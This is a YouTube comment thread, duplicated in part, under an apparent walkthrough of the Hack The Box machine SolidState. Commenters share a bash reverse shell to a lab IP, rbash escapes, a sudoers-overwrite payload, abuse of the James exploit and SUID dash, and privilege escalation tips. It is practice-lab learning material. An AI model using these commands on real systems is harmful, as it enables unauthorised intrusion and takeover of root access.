I'm sure you already found this out since this was almost a year ago, but you should be able to install 'gcc-multilib' on your host (kali) instance, and then you can compile your C code with the '-m32' gcc flag, which will compile your binary as a 32-bit binary. That way you won't need a 32-bit machine lying around. Another quick tip is that sometimes you'll have glibc version incompatibilities, and you can use the gcc flag '-D_GNU_SOURCE', which should use more portable versions of glibc that will likely be compatible with the victim machine you're running the code on.
So glad I watch your videos after rooting! I spent far too long getting a reverse shell to work from the .py script - the dash trick was very cool and something I've made a note of for future reference!
18:21 the reverse shell didn't work because the "/bin/bash -c" is missing .It should be os.system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.23/1234 0>&1' ")
This box was a lot of fun and was indeed fairly straightforward, my main problem was getting a stable shell as mindy as I didn't escape rbash like you did. Nonetheless I rooted this box fairly quick so that's a good thing!
Interesting. When you get the exploit to run, you get a shell, but it's still the mindy user right? I actually found some python code to connect back to my box and put that in the /opt/tmp.py. Then, in order to get a root shell, I used the james exploit to run /opt/tmp.py whenever someone logged in. This way, I got a reverse shell as root. Not saying this way is better, it's probably a lot of unnecessary work. I like seeing different ways to priv esc, I've never seen that dash method before!
Just completed Solidstate yesterday and just watched this video. But I did tried to use bash or /bin/bash for rbash-escaping, it didn’t work for me. Seems bash is not in mindy’s bin...
Thanks for the video! I think there might be another privesc method I couldn't find any discussion on using CVE-2017-18190, since you can set up an ssh tunnel on port 631 to access the administration panel of CUPS 2.2.1. I might play around with it later and see but if anyone else has tried this I would like to know!
Thanks for the great walk through as usual ! I have one question thou. I'am not a Linux expert bur is any exploit you add to /etc/bash_completion.d will be executed once a user logs in ? or this is just specific to James exploit ? I remember reading that you can get a shell using bashrc or bash_auto-completion (not sure) if you can write files to Linux using FTP or any service that would allow you put files on the system. 26:10
Small inaccuracy escaping rbash, it's only because the exploit ran by another user, if it was a clean run you would have had to pop a rev she'll from a James exploit or at least run it yourself in order to bypass it with ctrlc.
Yeah -- Unfortunately didn't notice another user was on the box until it was too late. I believe I explain it near the very end of the video after i manually cleared out the bash completion junk.
IppSec, word, as always great videos. I didn't watch the whole thing sorry if you already knew m8 I mostly wanted to clarify that to people saying other methods work such as noprofile.
have you tried using these too? -> ssh mindy@10.10.10.51 -t "/bin/sh" or ssh mindy@10.10.10.51 -t "bash --noprofile" # (two - before noprofile; youtube renders them like - on my screen if not looking close)
20:26 The script didn't catch the cron process apparently because the delay interval is so long that the cron starts and finishes before the script can detect it. I set the sleep period to .01 and it caught it ! Simple yet very effective script. You used another script that does this automatically but in a more professional way but I can't recall the script name :( And thannnnks dude :D
@@MichaelImo Since box is retired... Use the james exploit to copy "/bin/bash" over to /home/mindy/bin. Since we know mindy's PATH is "/home/mindy/bin" we can run "bash" without any /'s. Maybe it had already been done and ippsec didn't notice, but I just tried out the box and that's the method I used!
You're probably right, that's probably the way we're supposed to do it tbh. Probably something I didn't notice or overlooked. But I'm pretty sure if you try to python tmp.py, it will run as mindy and give you a shell with mindy's permissions iirc.
@@ippsec i can confirm that it works. if your vi is being weird like in my case, the backspace wasn't working and luckily it had nano, so i modified the tmp.py by the ippsec's earlier payload, waited and w00t! Thanks o much Ippsec!! i also followed the 'dash' and 'james' exploit!! You are too good!!!!!
Thanks Ippsec for the always awesome tuts! I modified the command at 5:08-5:510 to make life easier for myself and anyone that may need this as follows grep -oP '\d{1,5}/tcp' NmapOutput.nmap | tr -d ' ' | sed 's/\/tcp/,/g' | sed 's/.$//' We could probably use it with back tick in a script to have it all in 1 line nmap -p- --open 10.10.10.120 -T4 -oA NmapOutput3 && Portlist=`grep -oP '\d{1,5}/tcp' NmapOutput3.nmap | tr -d ' ' | sed 's/\/tcp/,/g' | sed 's/.$//'` && echo "value is:$Portlist" && nmap --script vuln -p$Portlist 10.10.10.120
well im kinda new to hacking and not so good i have watched 4-5 of your videos and im curius on how you learned that much and if its possible for a 17 years old like me to become a fantastic inspiration man like u in hacking i want to ask from where should i start what is the most useful knowledge cause i try for 1-2 weaks to take my first machine down and i suck i start feeling shitty i would like to hear some help from where to start or any tips to become better and understand the theory behind all this just 1 more question can i try this machines when they become retired somewhere else ? just to understand it cause i cant own machine or user :( so at least i want to practise
The suid of /bin/dash is not s now for this box ,so I can't use it for privilege escalation. I think htb should changed this in last month, that's really weird. Why didn't they just keep it.
I am doing this machine once again. You have gaps between ssh mindy and rbash escape you used before the James exploit. and thats why you could escape it with "bash" command.
thanks for another great video. So this py file is run every 3 mins. Nothing showed in the cron jobs, so aside from being curious as to what the file does due to the permissions, is there any way to identify files that are actioned by the system? thanks
Is the James exploit which is waiting for a James login supposed to get a James login by the box. Or can the file be dropped for something like user crontab or similar?
i cannot scan nmap or ping machine and some one work fine and other don't in hack the box (all the configuration is super i followed every steps why is that happening)
Hello everybody, at min 10.33 Ippsec types bash to escape the rbash. This trick doesn't work for me. Is anybody having the same issue? How did you guys bypass it? Thank you for your time/help
after trying harder I found this amazing link that solved the issue. I hope this will help someone else too :) speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=9
@@jlinscott5174 it should NOT work, he didn't reset the machine prior to working on it the way to escape that is just "ssh mindy@10.10.10.51 bash" and you're good.
first, you will need to login to the VPN. Second of all, you need to make sure the machine is online. You can see the status of the machine from dashboard. If you want to working on a retired machine, you will need VIP access my friend.
Haha, he said Nine vah. I thought it was where Jesus was from, Nineveh, or around d there. I wonder if they secretly had internet then. Feels like just the other day. 👨💻
I'm sure you already found this out since this was almost a year ago, but you should be able to install 'gcc-multilib' on your host (kali) instance, and then you can compile your C code with the '-m32' gcc flag, which will compile your binary as a 32-bit binary. That way you won't need a 32-bit machine lying around. Another quick tip is that sometimes you'll have glibc version incompatibilities, and you can use the gcc flag '-D_GNU_SOURCE', which should use more portable versions of glibc that will likely be compatible with the victim machine you're running the code on.
Fuck this saved my life for haircut in 2023. I could not understand why it wasn't working. Thank you.
So glad I watch your videos after rooting! I spent far too long getting a reverse shell to work from the .py script - the dash trick was very cool and something I've made a note of for future reference!
18:21 the reverse shell didn't work because the "/bin/bash -c" is missing .It should be os.system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.23/1234 0>&1' ")
Probably my favorite box sad they retired it :/ Love the vid, glad you can pass your knowledge down to the unlearned like me!
I was working this box while you were recording the /bulb in the ssh login script was me lol
This box was a lot of fun and was indeed fairly straightforward, my main problem was getting a stable shell as mindy as I didn't escape rbash like you did. Nonetheless I rooted this box fairly quick so that's a good thing!
Nc didn’t return the shell because you specified 15-24 in your IPaddress - not 14-23
17:10
i noticed this as well - we are on the ball!
that part made me anxious
@@HK-sw3vi same lol
Interesting. When you get the exploit to run, you get a shell, but it's still the mindy user right?
I actually found some python code to connect back to my box and put that in the /opt/tmp.py. Then, in order to get a root shell, I used the james exploit to run /opt/tmp.py whenever someone logged in. This way, I got a reverse shell as root.
Not saying this way is better, it's probably a lot of unnecessary work. I like seeing different ways to priv esc, I've never seen that dash method before!
At 20:09 IppSec said that script runs every 3 minutes. Maybe I missed something, but where did he see that information?
Just completed Solidstate yesterday and just watched this video.
But I did tried to use bash or /bin/bash for rbash-escaping, it didn’t work for me. Seems bash is not in mindy’s bin...
I faced the same issue as well.
Thanks for the video! I think there might be another privesc method I couldn't find any discussion on using CVE-2017-18190, since you can set up an ssh tunnel on port 631 to access the administration panel of CUPS 2.2.1. I might play around with it later and see but if anyone else has tried this I would like to know!
Thanks for the great walk through as usual !
I have one question thou. I'am not a Linux expert bur is any exploit you add to /etc/bash_completion.d will be executed once a user logs in ? or this is just specific to James exploit ? I remember reading that you can get a shell using bashrc or bash_auto-completion (not sure) if you can write files to Linux using FTP or any service that would allow you put files on the system. 26:10
Good work Ipp. For anyone following along and not getting it make sure to log in with " ?????@10.10.10.51 -t bash --noprofile"
thanks man
thanks needed that little push
hats off mate, well done!
How can we know /bin/dash can be checked? or is it a generic checklist based approach ?
Why in the world would 6 people downvote this...
Small inaccuracy escaping rbash, it's only because the exploit ran by another user, if it was a clean run you would have had to pop a rev she'll from a James exploit or at least run it yourself in order to bypass it with ctrlc.
Yeah -- Unfortunately didn't notice another user was on the box until it was too late. I believe I explain it near the very end of the video after i manually cleared out the bash completion junk.
IppSec, word, as always great videos. I didn't watch the whole thing sorry if you already knew m8 I mostly wanted to clarify that to people saying other methods work such as noprofile.
have you tried using these too? -> ssh mindy@10.10.10.51 -t "/bin/sh" or ssh mindy@10.10.10.51 -t "bash --noprofile" # (two - before noprofile; youtube renders them like - on my screen if not looking close)
@@TsukiCTF " ssh mindy@10.10.10.51 -t "bash --noprofile" worked for me I'll have to member this trick in the future
22:00 shouldn't write to sudoes be enough? like:
os.system( '/bin/echo "mindy ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers')
sudo su -
and ur root *shrug*
20:26 The script didn't catch the cron process apparently because the delay interval is so long that the cron starts and finishes before the script can detect it. I set the sleep period to .01 and it caught it ! Simple yet very effective script. You used another script that does this automatically but in a more professional way but I can't recall the script name :(
And thannnnks dude :D
Probably PSPY
@@ippsec Yes it is. Thanks :D
bash doesn't work on my mindy shell x(
same... i'm thinking they may have made changes to the box since this video has come out.
@@MichaelImo Since box is retired... Use the james exploit to copy "/bin/bash" over to /home/mindy/bin. Since we know mindy's PATH is "/home/mindy/bin" we can run "bash" without any /'s. Maybe it had already been done and ippsec didn't notice, but I just tried out the box and that's the method I used!
Hey
Your simple nc reverse shell wasn't working because you entered the wrong ip in the first try
True, but it wouldn't have given him a root shell anyway since he ran it as mindy
As far as I remember, the /opt/tmp.py gets executed as root via a cron every 3 minutes. If i didn't typo, it should of worked.
You're probably right, that's probably the way we're supposed to do it tbh. Probably something I didn't notice or overlooked. But I'm pretty sure if you try to python tmp.py, it will run as mindy and give you a shell with mindy's permissions iirc.
I tried to python tmp.py as mindy and it gave me a restricted shell.
@@ippsec i can confirm that it works. if your vi is being weird like in my case, the backspace wasn't working and luckily it had nano, so i modified the tmp.py by the ippsec's earlier payload, waited and w00t! Thanks o much Ippsec!! i also followed the 'dash' and 'james' exploit!! You are too good!!!!!
Thanks Ippsec for the always awesome tuts!
I modified the command at 5:08-5:510 to make life easier for myself and anyone that may need this as follows
grep -oP '\d{1,5}/tcp' NmapOutput.nmap | tr -d '
' | sed 's/\/tcp/,/g' | sed 's/.$//'
We could probably use it with back tick in a script to have it all in 1 line
nmap -p- --open 10.10.10.120 -T4 -oA NmapOutput3 && Portlist=`grep -oP '\d{1,5}/tcp' NmapOutput3.nmap | tr -d '
' | sed 's/\/tcp/,/g' | sed 's/.$//'` && echo "value is:$Portlist" && nmap --script vuln -p$Portlist 10.10.10.120
"the path of least resistance" 😂
4:26 ...I have done so much tr and sed for no reason... THERE'S A GNMAP OUTPUT?!?!? grep-able nmap format sounds so nice
well im kinda new to hacking and not so good i have watched 4-5 of your videos and im curius on how you learned that much and if its possible for a 17 years old like me to become a fantastic inspiration man like u in hacking i want to ask from where should i start what is the most useful knowledge cause i try for 1-2 weaks to take my first machine down and i suck i start feeling shitty i would like to hear some help from where to start or any tips to become better and understand the theory behind all this
just 1 more question can i try this machines when they become retired somewhere else ? just to understand it cause i cant own machine or user :( so at least i want to practise
Hi, Ippsec, I don’t understand as the “/opt/tmp.py” was executed without being at cron job in 21:48. Can you tell me, please? Tks!
I also didn't understand that! how did you realize that the cron will execute every 3 min?
The suid of /bin/dash is not s now for this box ,so I can't use it for privilege escalation. I think htb should changed this in last month, that's really weird. Why didn't they just keep it.
amazing video (y) can u tell which screen recorder you are using ?
Obs.
I am doing this machine once again. You have gaps between ssh mindy and rbash escape you used before the James exploit. and thats why you could escape it with "bash" command.
`BASH_CMDS[lala]=/bin/bash;lala;` will allow you to escape a restricted shell on older rbash versions
thanks for another great video. So this py file is run every 3 mins. Nothing showed in the cron jobs, so aside from being curious as to what the file does due to the permissions, is there any way to identify files that are actioned by the system? thanks
I found it by using pspy (github.com/DominicBreuker/pspy) and watch the process list
@@FelixPeters14188 thanks a lot. I was struggling to find this information.
Wow i wish i was good at regex. More practice needed i guess.
Is the James exploit which is waiting for a James login supposed to get a James login by the box. Or can the file be dropped for something like user crontab or similar?
Curious what keyboard are you using?
Ducky Zero
IppSec thank you, it sounds fantastic lol
lol @ 7:37. Did you win Netwars?
Couldn't connect to the mail server using thunderbird..
i cannot scan nmap or ping machine and some one work fine and other don't in hack the box (all the configuration is super i followed every steps why is that happening)
I think 2>&1 in your reverse shell will take care of the errors landing in the host session and should better detach from the user term
Is it can use evolution for see the email?
So how is it that you are able to serve a file from port 80 without having to configure port forwarding on your router?
there is no need for port forwarding on router... This is happening inside HTB VPN
tejas zarekar ah, of course...that makes sense. Thanks for the reply.
no james escalation :/ still great vid!
Hello everybody, at min 10.33 Ippsec types bash to escape the rbash. This trick doesn't work for me. Is anybody having the same issue? How did you guys bypass it? Thank you for your time/help
after trying harder I found this amazing link that solved the issue. I hope this will help someone else too :)
speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=9
@@marcobrandoni8433 Thanks buddy, still learning a lot ;)
That "bash --noprofile" did the trick! Thanks!
@@jlinscott5174 it should NOT work, he didn't reset the machine prior to working on it the way to escape that is just "ssh mindy@10.10.10.51 bash" and you're good.
Hey ippsec can you help me...
Everytime i scan a machine from nmap it says "host seems down"... I don't know why
first, you will need to login to the VPN.
Second of all, you need to make sure the machine is online. You can see the status of the machine from dashboard.
If you want to working on a retired machine, you will need VIP access my friend.
Haha, he said Nine vah. I thought it was where Jesus was from, Nineveh, or around d there. I wonder if they secretly had internet then. Feels like just the other day. 👨💻
is there a list or database for all the additions you put on your nmap (for ex. -sC, -sV)? thanks!
search 'man nmap' on google
after root python script much simpler open user.txt and root.txt with py script and write it to txt file
This comments OMG... You all so smart but i doubt you can do 5% of what he's doing!
I got debian_chroot from (ssh username@IP -t "bash --noprofile"). Not from typing bash in mindy.